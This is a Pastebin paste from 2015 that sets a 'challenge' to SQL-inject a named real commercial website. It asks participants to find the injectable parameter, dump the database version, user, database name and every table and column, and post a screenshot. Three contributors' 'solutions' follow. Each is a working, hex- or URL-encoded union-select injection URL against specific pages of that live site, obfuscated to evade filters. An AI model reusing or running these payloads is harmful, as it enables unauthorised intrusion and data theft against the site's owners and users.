Advertisement
S0yn3K

SQL Challenge #1

May 25th, 2015
358
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.43 KB | None | 0 0
  1. SQL Challenge #1
  2. nob like me wink emoticon
  3. Level:: Easy
  4. ‪#‎task‬::~
  5. 1.find inject point
  6. 2.Print Db_details and tables with columns
  7. 3.union base only
  8. 4.Post Pic as prof
  9. 5.pm me your query
  10.  
  11. target: http://www.burmeseclassic. biz/
  12.  
  13. solutions ;)
  14. by Amir
  15.  
  16. http://www.burmeseclassic.biz/u_player_m.php?id=%2d%33%39%32%20%2f%2a%21%31%32%33%34%35%55%6e%49%6f%4e%2a%2f%20%2f%2a%21%31%32%33%34%35%53%65%4c%65%43%74%2a%2f%20%31%2c%32%2c%63%6f%6e%63%61%74%28%30%78%33%63%36%32%37%32%33%65%33%63%36%36%36%66%36%65%37%34%32%30%37%33%36%39%37%61%36%35%33%64%33%33%32%30%36%33%36%66%36%63%36%66%37%32%33%64%37%32%36%35%36%34%33%65%34%62%36%31%37%33%36%38%36%64%36%39%37%32%36%39%32%30%34%33%36%38%36%35%36%35%37%34%36%31%36%38%2c%30%78%33%63%36%32%37%32%33%65%2c%30%78%37%36%36%35%37%32%37%33%36%39%36%66%36%65%32%30%32%30%32%30%33%61%33%61%32%30%32%30%32%30%2c%76%65%72%73%69%6f%6e%28%29%2c%30%78%33%63%36%32%37%32%33%65%2c%30%78%37%35%37%33%36%35%37%32%32%30%32%30%32%30%33%61%33%61%32%30%32%30%32%30%2c%75%73%65%72%28%29%2c%30%78%33%63%36%32%37%32%33%65%2c%30%78%36%34%36%32%32%30%32%30%32%30%33%61%33%61%32%30%32%30%32%30%2c%64%61%74%61%62%61%73%65%28%29%2c%6d%61%6b%65%5f%73%65%74%28%36%2c%40%3a%3d%30%78%30%61%2c%28%73%65%6c%65%63%74%28%31%29%66%72%6f%6d%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%6d%61%6b%65%5f%73%65%74%28%35%31%31%2c%40%2c%30%78%33%63%36%63%36%39%33%65%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%29%2c%40%29%29%2c%34%2c%35%2c%36%2c%37%2c%38
  17.  
  18. by Janus Slovan
  19.  
  20. http://www.burmeseclassic.biz/show2_other_m.php?id=239 and 0 UNioN %53eLEcT 1,2,3,4,COnCat%280x3c2f6469763e3c62723e3c62723e3c62723e3c63656e7465723e,version%28%29,0x203a3a206a616e7573,0x3c62723e64617461626173653a20,DataBasE%28%29,0x3c62723e757365723a20,UsEr%28%29, concat%28@c:=0x00,if%28%28%73elect count%28*%29 from information_schema.columns where table_schema=database%28%29 and @c:=concat%28@c,0x3c6c693e,table_name,0x2e,column_name%29%29,0x00,0x00%29,@c%29%29,6
  21.  
  22. by Тнє Цпіфцє
  23.  
  24. http://www.burmeseclassic.biz/show2_other.php?id=.235 %75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%63%6f%6e%63%61%74%28%30%78%37%34%36%38%33%33%32%30%37%35%34%65%36%39%35%31%37%35%33%33%2c%30%78%33%63%36%32%37%32%33%65%2c%76%65%72%73%69%6f%6e%28%29%2c%30%78%33%63%36%32%37%32%33%65%2c%75%73%65%72%28%29%2c%30%78%33%63%36%32%37%32%33%65%2c%64%61%74%61%62%61%73%65%28%29%29%2c%36%2d%2d%20
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement